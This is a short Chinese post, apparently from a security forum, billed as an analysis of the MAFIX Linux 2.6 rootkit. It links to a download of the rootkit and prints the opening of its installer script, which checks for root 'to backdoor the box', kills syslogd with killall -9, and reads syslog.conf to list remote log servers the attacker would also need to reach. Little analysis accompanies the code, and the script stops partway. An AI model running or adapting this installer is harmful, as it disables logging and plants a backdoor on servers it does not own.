MAFIX - Linux 2.6 rootkit分析
MAFIX - Linux 2.6 rootkit
这后门很贱,服务器中过一次,属于这个后门的改版。那个添加了模块。
下载地址:
https://forum.eviloctal.com/attachment.php?aid=13419
内容:
MAXFIX
---HOW-TO
---mafix
---mafixlibs
---root
下面为root的内容,也就是安装脚本。
#!/bin/bash
######################
# mafix 0.2 #
# fud 2009/07/15 #
######################
BASEDIR=`pwd`
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
BLK=' [1;30m'
MAG=' [1;35m'
CYN=' [1;30m'
RED='^[[1;32m'
DMAG=' [1;37m'
RES=' [0m'
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/\ / /\ / /\ ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |::\ / /::\ / /:/_ ${DMAG} / /\ ${CYN} | |:| ${RES}"
echo "${CYN} | |:|:\ / /:/\:\ / /:/ /\ ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|\:\ / /:/~/::\ / /:/ /:/ ${DMAG}/__/::\ ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/ ${DMAG}\__\/\:\__ ${CYN} /__/::::\____${RES}"
echo "${CYN} \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ ${DMAG} \ \:\/\ ${CYN} ~\~~\::::/${RES}"
echo "${CYN} \ \:\ \ \::/ \ \::/ ${DMAG} \__\::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} \ \:\ \ \:\ \ \:\ ${DMAG} \__\/ ${CYN} | |:| ${RES}"
echo "${CYN} \__\/ \__\/ \__\/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}- the ferrari of rootkits - ${RES}"
sleep 5
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
tar zxf mafixlibs
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
exit
fi
cd $BASEDIR
sleep 1
killall -9 syslogd >/dev/null 2>&1
startime=`date +%S`
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
echo
for host in $REMOTE; do
echo -n " "
echo $host
done
echo
echo ' ${CYN}coz this box is logging to it${RES}'
- 最新评论